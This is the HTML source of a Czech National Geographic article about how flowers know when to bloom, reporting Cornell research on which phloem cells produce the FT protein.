<!DOCTYPE html>


<!--[if IE 8 ]><html xmlns:fb="https://ogp.me/ns/fb#" class='ie8' ><![endif]-->
<!--[if !IE 8]><!-- --><html xmlns:fb="https://ogp.me/ns/fb#" ><!--<![endif]-->
<head>
<script>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</script>


<script>
	dataLayer = [{
		'serverAdresa': 'www.national-geographic.cz',
		'rubrikaTitle': 'Články',
		'rubrikaName': 'clanky',
		'template': 'clanek',
			'title': "Jak květiny vědí, kdy přišel čas rozkvést?",
			'autor': ' Redakce',
				'publishedDateTime': "2019-04-01T19:44:00+02:00",
				'articleID': 4157238045,
				'back': "4157238045-8258-104",
		'breadcrumb': [
			{'name':"National Geographic", 'link':"www.national-geographic.cz"},
			{'name':"Články", 'link':"https:\/\/www.national-geographic.cz\/clanky\/"},
			{'name':"Jak květiny vědí, kdy přišel čas rozkvést?", 'link':"https:\/\/www.national-geographic.cz\/clanky\/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html"},
		],
		'time': {
			'clientStart': new Date()
		},
		'device': "desktop",
		'url': 'https://www.national-geographic.cz/clanky/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html',
		'safety': '0',
		'version':'live',
	}];
</script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MDK6C6');</script>
<!-- End Google Tag Manager -->

<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-P2SSW3B');</script>
<!-- End Google Tag Manager -->
<meta name="google-site-verification" content="QVEQRgY_Pv7myjlFMeZj8X9qPdOhpprUM3fpvvLgvOE">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Jak květiny vědí, kdy přišel čas rozkvést? - National Geographic</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="robots" content="index,follow">
<meta name="keywords" lang="cs" content="">
<meta name="description" lang="cs" content="Příroda se řídí vlastním časem. Dosud žádná z vědeckých studií neuměla přesně vysvětlit podrobný proces kvetení. Nyní výzkum identifikoval buňky, které pomáhají při produkci důležitého genu označovaného Flowering locus T (FT).">
<meta http-equiv="imagetoolbar" content="no">
<meta name="yandex-verification" content="08250dbf55e255c5">
<link rel="shortcut icon" href="https://g.denik.cz/images/favicon/national-geographic_cz.ico" type="image/x-icon">

<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-498483448dce-1554197672.css">
<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-6a8ceb27d6fc-1551080955.css">
<!--[if lt IE 9]><script src="https://g.denik.cz/webtemp/jsloader-f2d760122d0e-html5shiv.min-1415620627.js"></script>
<![endif]-->
<link rel="alternate" href="https://www.national-geographic.cz/rss/zobraz/" type="application/rss+xml" title="RSS kanál National Geographic">


<meta property="og:url" content="https://www.national-geographic.cz/clanky/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html">
<meta property="article:author" content="https://www.facebook.com/natgeocesko/">
<meta property="og:site_name" content="National Geographic Česko">
<meta property="og:title" content="Jak květiny vědí, kdy přišel čas rozkvést?">
<meta property="og:description" content="Příroda se řídí vlastním časem. Dosud žádná z vědeckých studií neuměla přesně vysvětlit podrobný proces kvetení. Nyní výzkum identifikoval buňky, které pomáhají při produkci důležitého genu označovaného Flowering locus T (FT).">
    <meta property="og:image" content="https://g.denik.cz/104/ba/profimedia-0006227263_ng-detail-photo-p.jpg">
    <meta property="og:image:width" content="980">
    <meta property="og:image:height" content="653">
<link rel="previewimage" href="https://g.denik.cz/104/ba/profimedia-0006227263_ng-detail-photo-p.jpg">
<script type="text/javascript" async src="//assets.pinterest.com/js/pinit.js"></script>

</head>

<body id="NationalGeographicCZ">
<div class="page">
	<div class="toplista">
    <div id="top-lista" class="top-lista-projekt-national-geographic">
        <div class="top-lista-container">
            <div class="top-lista-right">
                <div class="top-lista-more">
                    více >>
                </div>
            </div>
            <ul>
                    <li>
                        <a href="https://www.denik.cz/" target="_blank"
                           title="Deník">
                            Deník
                        </a>
                    </li>
                    <li>
                        <a href="https://sip.denik.cz/" target="_blank"
                           title="Šíp">
                            Šíp
                        </a>
                    </li>
                    <li>
                        <a href="https://www.kafe.cz/" target="_blank"
                           title="Kafe">
                            Kafe
                        </a>
                    </li>
                    <li>
                        <a href="https://www.ireceptar.cz/" target="_blank"
                           title="iReceptář">
                            iReceptář
                        </a>
                    </li>
                    <li>
                        <a href="https://www.cars.cz/" target="_blank"
                           title="Cars">
                            Cars
                        </a>
                    </li>
                    <li>
                        <a href="http://www.dumazahrada.cz/" target="_blank"
                           title="Dům a zahrada">
                            Dům a zahrada
                        </a>
                    </li>
                    <li>
                        <a href="https://www.tipcars.com/" target="_blank"
                           title="TipCars">
                            TipCars
                        </a>
                    </li>
                    <li>
                        <a href="https://www.annonce.cz/" target="_blank"
                           title="Annonce">
                            Annonce
                        </a>
                    </li>
                    <li>
                        <a href="https://www.realcity.cz/" target="_blank"
                           title="Realcity">
                            Realcity
                        </a>
                    </li>
                    <li>
                        <a href="https://dotyk.denik.cz/" target="_blank"
                           title="Dotyk">
                            Dotyk
                        </a>
                    </li>
                    <li>
                        <a href="https://www.national-geographic.cz/" target="_blank"
                           title="National Geographic">
                            National Geographic
                        </a>
                    </li>
                    <li>
                        <a href="https://automix.denik.cz/" target="_blank"
                           title="Automix">
                            Automix
                        </a>
                    </li>
                    <li>
                        <a href="http://vlasta.kafe.cz/" target="_blank"
                           title="Vlasta">
                            Vlasta
                        </a>
                    </li>
                    <li>
                        <a href="https://story.kafe.cz/" target="_blank"
                           title="Story">
                            Story
                        </a>
                    </li>
                    <li>
                        <a href="http://www.kondice.cz/" target="_blank"
                           title="Kondice">
                            Kondice
                        </a>
                    </li>
                    <li>
                        <a href="https://kvety.kafe.cz/" target="_blank"
                           title="Květy">
                            Květy
                        </a>
                    </li>
                    <li>
                        <a href="https://prekvapeni.kafe.cz/" target="_blank"
                           title="Překvapení">
                            Překvapení
                        </a>
                    </li>
                    <li>
                        <a href="http://www.igurmet.cz/" target="_blank"
                           title="iGurmet">
                            iGurmet
                        </a>
                    </li>
                    <li>
                        <a href="https://www.estranky.cz/" target="_blank"
                           title="eStránky">
                            eStránky
                        </a>
                    </li>
                    <li>
                        <a href="https://praktickazena.kafe.cz" target="_blank"
                           title="Kreativ">
                            Kreativ
                        </a>
                    </li>
                    <li>
                        <a href="https://www.automodul.cz/" target="_blank"
                           title="Automodul.cz">
                            Automodul.cz
                        </a>
                    </li>
            </ul>
        </div>
    </div>
	</div>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=348273491966980&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

	<div class="leaderboard">
		<div class="inner">
<div class="ads-box label-right">
	<div id="leaderboard-top"></div>
</div>
<div id="sticky"></div>		</div>
	</div>

	<header class="page-header">
		<div class="inner">
			<h1>
				<a href="/">
					<img src="https://g.denik.cz/images/ng/ng_logo.svg" height="50" alt="">
				</a>
			</h1>

			<div class="search" role="search">
				<p class="sr-only">Hledat:</p>
					<form action="/clanky/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html" method="get" id="frm-hledaniForm">
						<input type="text" name="q" placeholder="Vyhledat" id="frm-hledaniForm-q" required data-nette-rules='[{"op":":filled","msg":"Zedejte hledaný text."}]'><input type="submit" name="odeslat" value="Hledat">
					<input type="hidden" name="do" value="hledaniForm-submit"><!--[if IE]><input type=IEbug disabled style="display:none"><![endif]-->
</form>

			</div>

		</div>
	</header>


	<nav class="page-navigation" role="navigation">
		<div class="inner">
			<ul>

		<li class="homepage">
			<a href="/">Úvodní stránka</a>
		</li>

		<li class="active">
			<a href="/clanky/">Články</a>
		</li>

		<li>
			<a href="/fotky/">Fotky</a>
		</li>

		<li>
			<a href="/souteze/">Soutěže</a>
		</li>

		<li>
			<a href="/kvizy/">Kvízy</a>
		</li>

		<li>
			<a href="/specialy/">Speciály</a>
		</li>

		<li>
			<a href="/casopis/">Časopis</a>
		</li>

		<li><a href="http://www.eshop-nationalgeographic.cz/">Eshop</a></li>

		<li>
			<a href="/pribehy-prirody/">Den v ZOO</a>
		</li>

				<li class="subscription">
					<a href="/casopis/obsah-casopisu-brezen-2019-20190328.html">
					<img src="https://g.denik.cz/104/95/cover-ng-03-19-bez-ean_ng-mag-menu.jpg" width="114" height="165" alt="National Geographic" title="National Geographic">
					</a>
					<div>
						<span class="magazine">Časopis</span>
						<span class="national">National</span>
						<span class="geographic">Geographic</span>
						<a href="https://www.mojepredplatne.cz/predplatne/national-geographic-lp?utm_source=national-geographic&utm_medium=o-casopisu&utm_campaign=predplatne-selfpromo-z-webu">Předplatné</a>
					</div>
				</li>
			</ul>
		</div>
	</nav>



	<div class="page-content">
		<div class="inner">

    <div class="layout">
        <div class="column wide">
            <article class="article-base" itemscope itemtype="https://schema.org/Article">
                <h1 itemprop="headline">Jak květiny vědí, kdy přišel čas rozkvést?</h1>
                <p itemprop="description">Příroda se řídí vlastním časem. Dosud žádná z vědeckých studií neuměla přesně vysvětlit podrobný proces kvetení. Nyní výzkum identifikoval buňky, které pomáhají při produkci důležitého genu označovaného Flowering locus T (FT).</p>


                
                    



                

                <figure itemscope itemtype="https://schema.org/ImageObject" class="ImageObject">
                <div class="figure-inner">
                    <meta itemprop="representativeOfPage" content="True">
                        <a itemprop="contentUrl" href="/galerie/foto.html?mm=profimedia-0006227263" class="protected">

                                    <img src="https://g.denik.cz/104/ba/profimedia-0006227263_ng-list-article-p.jpg" width="670" height="446" alt="" title="" class="portrait">
                        </a>
                </div>
                    <figcaption>
                        <p>
                            <span itemprop="author">Profimedia.cz</span>
                        </p>
                    </figcaption>
                </figure>




                <div class="article-area">
                    <div itemprop="text">
                        <div class="article-meta">
                            <p itemprop='author'><strong>Autor:</strong>
 Redakce
</p>
                            <p itemprop='datePublished'>01. 04. 2019</p>
                        </div>
                        <p>FT je velmi důležitý protein, který „cestuje“ z listů rostliny až na vrchol výhonku, kde spouští kvetení. Vědci z Cornellovy univerzity v New Yorku chtěli odhalit, které buňky tento protein produkují.</p>
<p>Věděli, že u rostlin se proces rozkvětu spouští spolu se změnou délky dne. Některé rostliny kvetou jen na jaře či na podzim, kdy je den kratší, proto se jim říká krátkodenní. Jiné vyžadují pro tvorbu květů delší letní den a označujeme je jako dlouhodenní.</p>
<p>FT se přenáší přes floém rostliny. U cévnatých rostlin je floém systémem pletiv, která rozvádí organické živiny (produkty fotosyntézy), především sacharózu, do všech částí rostliny, kde je třeba.</p>
<div class="video-container video-wrap"><iframe id="youtube_LjCzPp-MK48" class="video-youtube" data-title="Youtube - LjCzPp-MK48" data-type="youtube" data-video="LjCzPp-MK48" data-source="video/youtube" data-start="0" width="560" height="315" src="https://www.youtube.com/embed/LjCzPp-MK48" frameborder="0" allowfullscreen></iframe></div>
<p>Ve své studii se vědci zaměřili na Arabidopsis neboli Huseníček a tabákovou rostlinu Maryland Mammoth.</p>
<p>Vzhledem k tomu, že cévy listů jsou velmi malé, a navíc jsou pokryty fotosyntetickými buňkami bohatými na zelený chlorofyl, identifikování buněk, které produkují FT, bylo velmi obtížné. Profesor biologie rostlin a vedoucí výzkumu Robert Turgeon proto se svým týmem použil fluorescenční proteiny, které zvýraznily oblasti, ve kterých byl FT vyroben.</p>
<p>„Jde o velmi komplikovanou síť, kterou nelze plně pochopit, dokud si neuvědomíte, co se s jednotlivými buňkami děje, proto je jejich geografie tak důležitá,“ řekl Robert Turgeon.</p>
<div class="video-container video-wrap"><iframe id="youtube_I8W4LyIXINE" class="video-youtube" data-title="Youtube - I8W4LyIXINE" data-type="youtube" data-video="I8W4LyIXINE" data-source="video/youtube" data-start="0" width="560" height="315" src="https://www.youtube.com/embed/I8W4LyIXINE" frameborder="0" allowfullscreen></iframe></div>
<p>Fluorescenční proteiny ukázaly dva jedinečné soubory doprovodných buněk ve floému, kde byl produkován FT, a to u obou druhů rostlin. Ve chvíli, kdy vědci tyto doprovodné buňky usmrtili, proces kvetení se zpozdil.</p>
<p>Výsledky výzkumu tak odhalily důležité vnitřní fungování procesu v rostlinách, jenž může do budoucna hodně pomoci. „Pochopení, kde se FT nachází, a jak je spolupracuje s jinými faktory, je velmi důležitý krok pro pěstitele, kteří nyní můžou jemně manipulovat s dobou květu,“ dodal nadšeně vědecký tým.</p>
<p><a href="https://www.national-geographic.cz/clanky/rarity-mezi-rostlinami-10-druhu-ktere-ke-kveteni-potrebuji-tmavou-noc.html" target="_blank" rel="noopener"><strong></strong></a></p>
<p></p>

<div id="commercial-article-native-detail"></div>
                    </div>

                        <div class="sidebar-area">
                            <div>
                                <div class="social_toolbox sticky">
	<div class="dv4-clanek-sdileni">
<script type="text/javascript" async src="https://platform.twitter.com/widgets.js"></script>
<div class="dv4-clanek-sdileni">
    <a title="Sdílej na Facebook" href="https://www.facebook.com/sharer.php?u=https://www.national-geographic.cz/clanky/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html" onclick="javascript:window.open(this.href,'', 'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=450,width=550,left=300,top=300');return false;" target="_blank" class="facebook"></a>
    <a title="Sdílej na Twitter" href="https://twitter.com/intent/tweet?url=https://www.national-geographic.cz/clanky/video-jak-kvetiny-vedi-kdy-je-cas-rozkvest-20180410.html/&text=$nadpis/&via=KAFEcz" class="twitter"></a>
</div>
	</div>
                                </div>
                            </div>
                        </div>
                </div>




<div id="outstream"></div>

            </article>
        </div>

        <div class="column narrow">


<section class="light">
	<h1>Jsme na Facebooku</h1>
	<div class="fb-like-box"
		data-href="https://www.facebook.com/natgeocesko/"
		data-width="300" data-colorscheme="light" data-show-faces="false" data-header="false"
		data-stream="false" data-show-border="false"></div>
</section>

<div class="ads-box">
	<div id="button"></div>
</div><div class="ads-box">
	<div id="square-1"></div>
</div>


  <section class="top-galerie-box">
    <h1 class="top-galerie-box-title"><a href="/top-galerie/">#&nbsp;Top galerie</a></h1>
    <div>


	<article class="listing article-small">
		<a href="/top-galerie/iluzioniste-ve-zvireci-risi-20190303.html">
			<figure>
					<img src="https://g.denik.cz/104/9c/profimedia-0298909686_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Dvě gazely, které splynuly v jednu, z keňské rezervace Masaai Mara." title="Dvě gazely, které splynuly v jednu, z keňské rezervace Masaai Mara." class="portrait">
			</figure>
			<h1>Iluzionisté ve zvířecí říši</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/top-galerie/5-jednobarevnych-mest-sveta-20190204.html">
			<figure>
					<img src="https://g.denik.cz/104/7e/profimedia-0335016229_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Místo je fascinující směsí mayských a koloniálních památek." title="Místo je fascinující směsí mayských a koloniálních památek." class="portrait">
			</figure>
			<h1>5 měst v jedné barvě</h1>
		</a>
	</article>
    </div>
  </section>

	<div class="sticker-bar" >
<div class="ads-box ks">
	<div id="commercial-article-KS1"></div>
</div>
<div id="commercial-article-KS2"></div>
<div id="commercial-article-KS3"></div>
<div id="commercial-article-KS4"></div>
	</div>


	<section class="teasers teasers-video">
		<h1><a href="/video/"># VYBRANÁ VIDEA</a></h1>
		<div>


	<article class="listing article-small">
		<a href="/video/video-psi-terapeut-na-baterky-ma-pomahat-nemocnym-i-seniorum-20190319.html">
			<figure>
					<img src="https://g.denik.cz/104/00/profimedia-0420479022_ng-sidebar-lg-l.jpg" width="379" height="212" alt="Nejnovějším robotickým kamarádem je štěně zlatého retrívra." title="Nejnovějším robotickým kamarádem je štěně zlatého retrívra." class="landscape">
			</figure>
			<h1>VIDEO: Psí terapeut na baterky má pomáhat nemocným i seniorům</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/jak-reaguji-rostliny-kdyz-jim-nekdo-ublizuje-20190219.html">
			<figure>
					<img src="https://g.denik.cz/104/2b/profimedia-0198242795_ng-sidebar-lg-p.jpg" width="280" height="187" alt="I bez nervového systému si rostliny vytvořili vlastní systém ochrany." title="I bez nervového systému si rostliny vytvořili vlastní systém ochrany." class="portrait">
			</figure>
			<h1>Jak reagují rostliny, když jim někdo ubližuje?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/planeta-nebo-plast-prekvapivych-91-plastoveho-odpadu-neprojde-recyklaci-20190120.html">
			<figure>
					<img src="https://g.denik.cz/104/5c/plastic-gettyimages-500712980_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Čínský dělník třídí plastové lahve při recyklaci ve vesnici Dong Xiao Kou na okraji Pekingu." title="Čínský dělník třídí plastové lahve při recyklaci ve vesnici Dong Xiao Kou na okraji Pekingu." class="portrait">
			</figure>
			<h1>Planeta, nebo plast? Překvapivých 91% plastového odpadu neprojde recyklací!</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/vanoce-ve-dvore-kralove-na-hrosi-mlade-si-museli-pockat-temer-30-let-20181219.html">
			<figure>
					<img src="https://g.denik.cz/104/6e/dvspdk-mlade-hrocha-simona-jirickova_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Hroši se rodí zpravidla ve vodě, kde také tráví většinu času. Mládě ve Dvoře Králové se však narodilo na souši." title="Hroši se rodí zpravidla ve vodě, kde také tráví většinu času. Mládě ve Dvoře Králové se však narodilo na souši." class="portrait">
			</figure>
			<h1>Vánoce ve Dvoře Králové: Na hroší mládě si museli počkat téměř 30 let</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-mozek-ani-oci-netusi-aneb-nejlepsi-svetove-iluze-2018-20181106.html">
			<figure>
					<img src="https://g.denik.cz/104/2d/3diluze_ng-sidebar-lg-l.jpg" width="381" height="212" alt="Iluze vždy vychází ze skutečného podnětu, který je smyslovými receptory chybně interpretován." title="Iluze vždy vychází ze skutečného podnětu, který je smyslovými receptory chybně interpretován." class="landscape">
			</figure>
			<h1>VIDEO: Mozek ani oči netuší aneb Nejlepší světové iluze 2018</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-desivy-zpev-nejvetsiho-selfoveho-ledovce-na-svete-20181017.html">
			<figure>
					<img src="https://g.denik.cz/104/56/profimedia-0124856877_ng-sidebar-lg-p.jpg" width="280" height="187" alt='Rossův šelfový ledovec má rozlohu 472 960 kilometrů čtverečních (Česká republika "jen" 78 866 km²).' title='Rossův šelfový ledovec má rozlohu 472 960 kilometrů čtverečních (Česká republika "jen" 78 866 km²).' class="portrait">
			</figure>
			<h1>VIDEO: Fascinující &quot;zpěv&quot; největšího šelfového ledovce na světě</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-beluha-zabloudila-do-reky-temze-jen-35-km-od-londyna-20180927.html">
			<figure>
					<img src="https://g.denik.cz/104/8c/profimedia-0384501213_ng-sidebar-lg-p.jpg" width="280" height="210" alt="Běluhy se v kalných vodách orientují podobně jako netopýři echolokací ultrazvukovými vlnami." title="Běluhy se v kalných vodách orientují podobně jako netopýři echolokací ultrazvukovými vlnami." class="portrait">
			</figure>
			<h1>VIDEO: Běluha zabloudila do řeky Temže, jen 35 km od Londýna</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-proc-maji-opicaci-kahau-tak-legracni-dlouhe-nosy-20190828.html">
			<figure>
					<img src="https://g.denik.cz/104/77/kahau2_ng-sidebar-lg-p.jpg" width="280" height="183" alt="Kahau nosatý" title="Kahau nosatý" class="portrait">
			</figure>
			<h1>Proč mají opičáci kahau tak legrační dlouhé nosy?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/ind-ktery-sazi-stromy-zachrance-nejvetsiho-ricniho-ostrova-na-svete-20180812.html">
			<figure>
					<img src="https://g.denik.cz/104/21/majuli2_ng-sidebar-lg-p.jpg" width="280" height="207" alt="Před 39 lety Jadav zasadil první strom..." title="Před 39 lety Jadav zasadil první strom..." class="portrait">
			</figure>
			<h1>Ind, který sází stromy: Zachránce největšího říčního ostrova na světě</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-zmrzlina-i-voda-z-hadice-aneb-jak-abnormalni-horka-zvladaji-zvirata-v-zoo-20180805.html">
			<figure>
					<img src="https://g.denik.cz/104/c2/d85-7114-export_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Lama alpaka zvolila originální způsob osvěžení." title="Lama alpaka zvolila originální způsob osvěžení." class="portrait">
			</figure>
			<h1>VIDEO: Zmrzlina i voda z hadice aneb Jak abnormální horka zvládají zvířata v zoo</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-titanuv-penis-v-akci-aneb-kratky-zivot-rozkvetleho-zmijovce-20180711.html">
			<figure>
					<img src="https://g.denik.cz/104/cc/profimedia-0376393188_ng-sidebar-lg-p.jpg" width="280" height="256" alt="Botanici z New Yorku zachytili netradiční květenství na video." title="Botanici z New Yorku zachytili netradiční květenství na video." class="portrait">
			</figure>
			<h1>VIDEO: Titanův penis v akci aneb Krátký život rozkvetlého zmijovce</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/1-strom-365-dni-skryta-kamera-odhalila-spoustu-navstevniku-20171129.html">
			<figure>
					<img src="https://g.denik.cz/104/0a/liska-abruzzo_ng-sidebar-lg-l.jpg" width="438" height="212" alt="V rozlehlých lesích Národního parku Abruzzo žije na 40 druhů savců, 30 druhů plazů a 300 druhů ptáků." title="V rozlehlých lesích Národního parku Abruzzo žije na 40 druhů savců, 30 druhů plazů a 300 druhů ptáků." class="landscape">
			</figure>
			<h1>1 strom, 365 dní: Skrytá kamera odhalila spoustu návštěvníků</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/plasty-nebo-planeta-20180606.html">
			<figure>
					<img src="https://g.denik.cz/104/c9/ng6-plast_ng-sidebar-lg-l.png" width="424" height="212" alt="Pomozte zachránit planetu" title="Pomozte zachránit planetu" class="landscape">
			</figure>
			<h1>Plasty, nebo planeta?</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-vedci-nechapou-v-rudem-mori-se-poprve-objevila-200-tunova-modra-velryba-20180604.html">
			<figure>
					<img src="https://g.denik.cz/104/48/profimedia-0103089551_ng-sidebar-lg-p.jpg" width="280" height="210" alt="Plejtvák obrovský je schopný ve vodě vyvinout rychlost až 50 km v hodině." title="Plejtvák obrovský je schopný ve vodě vyvinout rychlost až 50 km v hodině." class="portrait">
			</figure>
			<h1>VIDEO: Vědci nechápou! V Rudém moři se poprvé objevila 200 tunová modrá velryba</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/casopis-national-geographic-od-kvetna-v-novem-podivejte-se-20180514.html">
			<figure>
					<img src="https://g.denik.cz/104/cc/ngn_ng-sidebar-lg-l.jpg" width="349" height="212" alt="" title="" class="landscape">
			</figure>
			<h1>Časopis National Geographic od května v novém! Podívejte se</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-robot-ze-singapuru-smontoval-zidli-za-20-minut-20180424.html">
			<figure>
					<img src="https://g.denik.cz/104/b5/zidle-robot_ng-sidebar-lg-p.jpg" width="280" height="173" alt="Jen tři sekundy potřeboval robot k nalezení všech potřebných částí k sestavení." title="Jen tři sekundy potřeboval robot k nalezení všech potřebných částí k sestavení." class="portrait">
			</figure>
			<h1>VIDEO: Robot ze Singapuru smontoval židli za 20 minut</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-a-je-to-tady-premierovy-start-nejsilnejsi-rakety-falcon-heavy-20180207.html">
			<figure>
					<img src="https://g.denik.cz/104/25/rtx4rj1u_ng-sidebar-lg-p.jpg" width="280" height="192" alt="Kvůli silnému větru v horních vrstvách atmosféry byl start několikrát odložen." title="Kvůli silnému větru v horních vrstvách atmosféry byl start několikrát odložen." class="portrait">
			</figure>
			<h1>VIDEO: A je to tady! Premiérový start nejsilnější rakety Falcon Heavy</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/video-na-invalidnim-voziku-pokoril-horu-vysokou-jako-empire-state-building-20180124.html">
			<figure>
					<img src="https://g.denik.cz/104/5b/horolezec-lai_ng-sidebar-lg-l.jpg" width="345" height="212" alt="Lai, který je dnes závislý na invalidním vozíku, se nevzdal a svým odhodláním inspiruje sportovce z celého světa." title="Lai, který je dnes závislý na invalidním vozíku, se nevzdal a svým odhodláním inspiruje sportovce z celého světa." class="landscape">
			</figure>
			<h1>VIDEO: Na invalidním vozíku pokoří hory vysoké jako Empire State Building</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/niagarske-vodopady-vitejte-v-ledovem-kralovstvi-20180103.html">
			<figure>
					<img src="https://g.denik.cz/104/e2/rtx43wfv_ng-sidebar-lg-p.jpg" width="280" height="184" alt="Nezvyklý pohled na druhé největší vodopády na světě." title="Nezvyklý pohled na druhé největší vodopády na světě." class="portrait">
			</figure>
			<h1>Niagarské vodopády: Vítejte v ledovém království</h1>
		</a>
	</article>

	<article class="listing article-small">
		<a href="/video/exkluzivne-national-geographic-odhaluje-tajemstvi-kristova-hrobu-20171208.html">
			<figure>
					<img src="https://g.denik.cz/104/1f/profimedia-0314796426_ng-sidebar-lg-p.jpg" width="280" height="187" alt="Chrám Božího hrobu dnes představuje pro řadu křesťanských církví hlavní cíl poutníků v Jeruzalémě." title="Chrám Božího hrobu dnes představuje pro řadu křesťanských církví hlavní cíl poutníků v Jeruzalémě." class="portrait">
			</figure>
			<h1>EXKLUZIVNĚ: National Geographic odhaluje tajemství Kristova hrobu</h1>
		</a>
	</article>
		</div>
	</section>

<div class="sticker-bar">
	<div class="sticky">
<div class="ads-box">
	<div id="skyscraper-1"></div>
</div>	</div>
</div>        </div>
    </div>
		</div>
	</div>

	    <div>
	        <div class="inner">
<div class="ads-box label-right">
	<div id="leaderboard-bottom"></div>
</div>
	        </div>
	    </div>

	<footer class="page-footer">
		<div class="inner">

			<div id="strossle_footer">
        
        <div data-spklw-widget="widget-5746bf054fa3a"></div>





			</div>

			<div class="layout">
				<div class="column narrow">
					<section class="footer-magazine">
						<h1>Časopis National Geographic</h1>
						<div>
							<h2>Aktuální číslo</h2>
							<ul>
<li><strong>KDO JE TAM?:</strong> Nové objevy odhalují téměř s jistotou, že ve vesmíru nejsme sami. Ukážeme vám, jak pátráme po životě – a snažíme se navázat kontakt</li>
<li><strong>BORNEJSKÝ PODZEMNÍ SVĚT:</strong> Jeskyňáři objevují tajemství některých z největších, nejtajemnějších jeskyní na Zemi.</li>
<li><strong>NENÍ ÚNIKU:</strong> Salvador ničí válka gangů a chudoba. Mnoho lidí před nimi uteklo do Spojených států.</li>
<li><strong>BITVA O AMERICKÝ ZÁPAD:</strong> Nové snahy omezit rozlohu chráněných území rozdmýchávají spor, který má kořeny hluboko v americké minulosti. Otázka zní: Čí je to zem?</li>
</ul>
<p><strong>Vychází 8. března 2019.</strong></p>
						</div>
					</section>
				</div>

				<div class="column wide">
					<section class="footer-subscription">
						<h1>Předplatné časopisu</h1>
						<p>Exkluzivní měsíčník National Geographic přináší strhující pohled do přírodních,
						technických, kulturních a etnických tajů tohoto světa.</p>
						<figure>
							<img src="https://g.denik.cz/104/95/cover-ng-03-19-bez-ean_ng-mag-footer.jpg" width="177" height="257" alt="National Geographic" title="National Geographic">
						</figure>
						<h2>Redakční pilíře:</h2>
						<ul>
							<li>Poznání o přírodních jevech</li>
							<li>Pohledy do zákulisí vědeckých expedic</li>
							<li>Přiblížení kultur a zvyků vzdálených národů</li>
							<li>Představení zajímavostí ze světa vědy a techniky</li>
							<li>Lokální reportáže s českou tématikou</li>
							<li>Exkluzivní fotografické záběry</li>
							<li>Mapové přílohy jsou součástí obsahu časopisu několikrát za rok</li>
						</ul>
						<p><a href="/casopis/">Více o časopisu</a></p>
					</section>
				</div>
			</div>


				<div class="footer-links">
					<p>&copy; 2009 - 2019 National Geographic Society and <a href="https://www.vlmedia.cz" target="_blank">VLTAVA LABE MEDIA a.s.</a> All rights reserved.</p>

					<ul>
						<li><a href="https://www.national-geographic.cz/rss/feed.html">RSS</a></li>
						<li><a href="https://www.vlmedia.cz/kontakty/redakce.html" target="_blank">Redakce</a></li>
						<li><a href="https://www.vlmedia.cz/kontakty/inzerce" target="_blank">Reklama</a></li>
						<li><a href="https://www.vlmedia.cz/podminky" target="_blank">Všeobecné smluvní podmínky</a></li>
						<li><a href="https://www.vlmedia.cz/podminky/zasady-zpracovani-osobnich-udaju/" target="_blank">Zásady zpracování osobních údajů</a></li>
						<li><a href="https://www.vlmedia.cz/zmena-osobnich-udaju/" target="_blank">Práva subjektů údajů</a></li>
					</ul>
				</div>
		</div>
	</footer>
</div>

	<!-- (C)2000-2011 Gemius SA - gemiusAudience / national-geographic.cz / Ostatni -->
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('nF46P0Rmi2U7a5CnJ2CzrrS478wKj07lBxzaUyM2d6z.I7');

